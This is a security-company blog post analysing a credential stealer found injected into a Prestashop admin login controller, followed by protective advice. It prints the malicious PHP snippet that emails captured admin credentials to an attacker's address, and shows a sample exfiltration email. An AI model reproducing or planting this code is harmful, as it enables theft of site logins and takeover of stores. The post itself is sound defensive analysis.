Credentials Stealer on Prestashop

  • October 21, 2016

In a matter of hours, a big e-commerce website can have hundreds of credit card numbers stolen and used by attackers on other websites around the world. We commonly see ecommerce websites infected with credit card (CC) stealers during our cleanup routine.

We’ve been writing more and more notes about these kinds of attacks lately:

Magento sites are the most targeted ecommerce platform due to its popularity, but Prestashop is also a big target. In most cases, the CC stealing code is encrypted and injected into the core files. This helps the attacker to avoid detection.

However, attackers sometimes choose a different approach on ecommerce platforms. Instead of stealing credit card data, they can steal CMS credentials, as we can see on this Prestashop site.

Stolen Prestashop Credentials

The code below was injected into this Prestashop file: ./controllers/admin/AdminLoginController.php:

public function processLogin()
   {
       /* Check fields validity */
       $passwd = trim(Tools::getValue('passwd'));
       $email = trim(Tools::getValue('email'));
$to = "bajatax121@gmail.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <bajatax@hacked.com>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

This small piece of code passes server information to variables, including the username and password used to log into the Prestashop backend. The information is finally sent to the attacker’s email address using the PHP mail() function.

The Email to Attackers

Here’s what the email sent to the attacker looks like:

From: hacked <bajatax@hacked.com>
Subject: panel admin prestashop www.attackeddomain.com
Date: 12 de agosto de 2016, 10:18:44 CEST
To: bajatax121@gmail.com

Link : http://www.attackeddomain.com/admins/ajax-tab.php?rand=1470989908670&up=hous
email: user@attackeddomain.com
pass: 7hMs6yG2XQjSV
by bajatax — sniper :v

Path : /usr/home/www.attackeddomain.com/web/controllers/admin/AdminLoginController.php

The email includes everything the attacker needs to log into the hacked Prestashop site.

From there, attackers can gain access to the site. This gives them total control over the victim’s backend interface, meaning they can change the content, install fake/infected modules or plugins, and much more.

Bounce Back

In this particular case, the victim started to receive bounce emails with the content above. From these bounced messages we identified the following in the mail headers:

Diagnostic-Code: smtp; 550 5.2.1 
The email account that you tried to reach is disabled. 
l3si6010735wjt.78 - gsmtp

This means that the attack had been reported or detected by Google and the account was subsequently disabled.

Malicious Uploader Scripts

In addition to the malicious code to steal login credentials, the attacker also placed an uploader script within AdminLoginController.php in order to maintain as much access to the server for as long as possible and re-upload another backdoor if needed.

Protect Your Site

With that being said, here are some steps you should take to further protect your site and avoid headaches:

  1. Use third party processors to handle the payment capture, transmission and processing. (E.g., PayPal, Recurly, Stripe). Reference our previous SAQ post to learn more of the payment integration options and how they affect your PCI SAQ requirements
  1. Keep your software up to date and always use strong passwords on your CMS users, database, FTP/SSH, hosting and cPanel accounts. Weak passwords and outdated software are the main cause of infections and reinfections. Site owners will avoid at all costs (or postpone updates) because they’ll have to spend money hiring developers to get their ecommerce sites migrated to the newest version. How much money will they lose if they have their client’s CC data or CMS logins stolen during several days? Practicing layered security and defense in depth helps prevent website security issues.
  1. Check your core files integrity regularly. CC and login stealers are usually injected into the core files. The core file integrity check is used during our cleanups to troubleshoot several cases. If you’re using WordPress, you can install our plugin which provides core integrity check. You can ask for professional help if you’re using an ecommerce platform.
  1. Last but not least, use a website firewall to protect your site moving forward. A Web Application Firewall will filter all HTTP and HTTPS traffic between your server and your visitors, blocking all known attacks and patching your site virtually, even if you forget an update.

As always, if you think your website has been hacked and need specialized assistance in website security, we’re available 24/7/365.

Conrado Torquato is Sucuri’s Malware Analyst who joined the company in 2014. His main responsibilities include fast response to malware incident cases, analysis of hacked websites, and educating customers about website security. Conrado’s professional experience covers more than 15 years of experience in the IT field, including experience with network and server management on mixed environments. When Conrado isn't nuking malware from websites, you might find him at the beach with his friends, doing other outdoor activities, or tasting new food. Connect with him on LinkedIn

Related Tags
Related Categories
You May Also Like